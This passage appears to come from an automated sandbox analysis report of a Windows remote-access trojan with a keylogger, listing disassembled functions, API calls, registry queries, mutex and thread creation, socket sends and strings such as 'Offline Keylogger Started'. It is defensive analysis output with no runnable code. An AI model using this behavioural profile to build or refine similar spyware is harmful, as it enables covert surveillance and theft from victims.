                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 0041C508
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                • String ID: xpF
                                                                                                • API String ID: 1852769593-354647465
                                                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1355 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1366 41b3ad-41b3bc call 4135e1 1355->1366 1367 41b3ee-41b3f7 1355->1367 1372 41b3c1-41b3d8 call 401fab StrToIntA 1366->1372 1368 41b400 1367->1368 1369 41b3f9-41b3fe 1367->1369 1371 41b405-41b410 call 40537d 1368->1371 1369->1371 1377 41b3e6-41b3e9 call 401fd8 1372->1377 1378 41b3da-41b3e3 call 41cffa 1372->1378 1377->1367 1378->1377
                                                                                                APIs
                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                                                                • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750F4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                • API String ID: 1866151309-2070987746
                                                                                                • Opcode ID: e87868676888afa6acbcf2b8ae3b58c9d8f29422fe8472525f73cbbb67b66dd9
                                                                                                • Instruction ID: 99e2d84e4b8fa31c947f893a9fcbf762d6d1118dcb79bce5eaccee633664c5dc
                                                                                                • Opcode Fuzzy Hash: e87868676888afa6acbcf2b8ae3b58c9d8f29422fe8472525f73cbbb67b66dd9
                                                                                                • Instruction Fuzzy Hash: 0311C47064414926C700F7659C97BFF76198B80304F94453BF806A71D3FB6C598683EE
                                                                                                Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1382 40a6b0-40a6c0 1383 40a6c6-40a6c8 1382->1383 1384 40a75d-40a760 1382->1384 1385 40a6cb-40a6f1 call 401f04 CreateFileW 1383->1385 1388 40a731 1385->1388 1389 40a6f3-40a701 GetFileSize 1385->1389 1392 40a734-40a738 1388->1392 1390 40a703 1389->1390 1391 40a728-40a72f CloseHandle 1389->1391 1393 40a705-40a70b 1390->1393 1394 40a70d-40a714 1390->1394 1391->1392 1392->1385 1395 40a73a-40a73d 1392->1395 1393->1391 1393->1394 1396 40a716-40a718 call 40b117 1394->1396 1397 40a71d-40a722 Sleep 1394->1397 1395->1384 1398 40a73f-40a746 1395->1398 1396->1397 1397->1391 1398->1384 1400 40a748-40a758 call 409097 call 40a1b4 1398->1400 1400->1384
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                • String ID: hQG
                                                                                                • API String ID: 1958988193-4070439852
                                                                                                • Opcode ID: 6ecf9d3ddebe9b008ab1d83f498866658564dad8f2fc55020f3775752d25f7c1
                                                                                                • Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
                                                                                                • Opcode Fuzzy Hash: 6ecf9d3ddebe9b008ab1d83f498866658564dad8f2fc55020f3775752d25f7c1
                                                                                                • Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F
                                                                                                Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                • String ID: Offline Keylogger Started
                                                                                                • API String ID: 465354869-4114347211
                                                                                                • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                • RegSetValueExA.KERNELBASE(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
                                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1818849710-4028850238
                                                                                                • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastMutex
                                                                                                • String ID: 0SG
                                                                                                • API String ID: 1925916568-2718230054
                                                                                                • Opcode ID: bc77eaf552dd10d8f01c03cd32d716e6d6dac4663c01f768c58145daaeb2b4d9
                                                                                                • Instruction ID: 897831e38bae895769414ba5eaefcaa992d87aaaa8244aa01aad5f1db7de32a1
                                                                                                • Opcode Fuzzy Hash: bc77eaf552dd10d8f01c03cd32d716e6d6dac4663c01f768c58145daaeb2b4d9
                                                                                                • Instruction Fuzzy Hash: 62D012B0614301EBDB0467709C5975936559B44702F50487AB50BD95F1CBFC88D08519
                                                                                                Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                                                                                • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventObjectSingleWaitsend
                                                                                                • String ID:
                                                                                                • API String ID: 3963590051-0
                                                                                                • Opcode ID: a6ddc366ca1b1ff27a8fbd3193a8b6bac2d22d3b1e5d5d6e63c0c915f383fbf5
                                                                                                • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                                • Opcode Fuzzy Hash: a6ddc366ca1b1ff27a8fbd3193a8b6bac2d22d3b1e5d5d6e63c0c915f383fbf5
                                                                                                • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                                Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                • RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                                                                                • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                                • RegCloseKey.KERNELBASE(00000000), ref: 00413773
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00475300), ref: 004135C2
                                                                                                • RegCloseKey.KERNELBASE(?), ref: 004135CD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                • RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID:
                                                                                                • API String ID: 1818849710-0
                                                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B85B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: GlobalMemoryStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 1890195054-2766056989
                                                                                                • Opcode ID: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
                                                                                                • Instruction ID: 3eac6c9810fdf3f5cdd4c6aee73cb3509883e52e26c84b2cc96e0464d85798e3
                                                                                                • Opcode Fuzzy Hash: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
                                                                                                • Instruction Fuzzy Hash: F6D017B58023189FC720DFA8E804A8DBBFCEB08210F00456AEC49E3300E770EC008B84
                                                                                                Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEventStartupsocket
                                                                                                • String ID:
                                                                                                • API String ID: 1953588214-0
                                                                                                • Opcode ID: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
                                                                                                • Instruction ID: d30f6c82ceabff406a890a607b6903e59214fa94f63df9469096212d3e1caec2
                                                                                                • Opcode Fuzzy Hash: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
                                                                                                • Instruction Fuzzy Hash: F90171B1408B809ED7359F28A8456967FE0AB55304F044D6EF1DA97B92D3B5A881CB18
                                                                                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundText
                                                                                                • String ID:
                                                                                                • API String ID: 29597999-0
                                                                                                • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00472AF0,004750F4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                  • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                • String ID:
                                                                                                • API String ID: 1170566393-0
                                                                                                • Opcode ID: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                                                                                • Instruction ID: b2b0aefd8e35b341f4c894e58f46b645776b5e98a3349e02c71c7f637998c076
                                                                                                • Opcode Fuzzy Hash: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                                                                                • Instruction Fuzzy Hash: 9DD05B322005316BD310576D6C00FFB569EDFD7760B110037F404D3251DA949C8247AC
                                                                                                Function 00409E1F Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 176396367-0
                                                                                                • Opcode ID: 6416f66ed626dfbba5e3356b56a4da38da9dbdb7e4b27ac51402a9fd72fbddea
                                                                                                • Instruction ID: d045c5f40cf3cd8d18dd0e016010c764e1ae3afdbf5b32035de166f485dbb4de
                                                                                                • Opcode Fuzzy Hash: 6416f66ed626dfbba5e3356b56a4da38da9dbdb7e4b27ac51402a9fd72fbddea
                                                                                                • Instruction Fuzzy Hash: 681193319002059BCB15EF66E842AEE7BB5AF54314B10403FF446672E2EF78AD15CB98
                                                                                                Function 00450154 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                • _free.LIBCMT ref: 004501C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 614378929-0
                                                                                                • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                                                • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                                                                                • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                                                • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779
                                                                                                Function 00445B74 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                                                • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
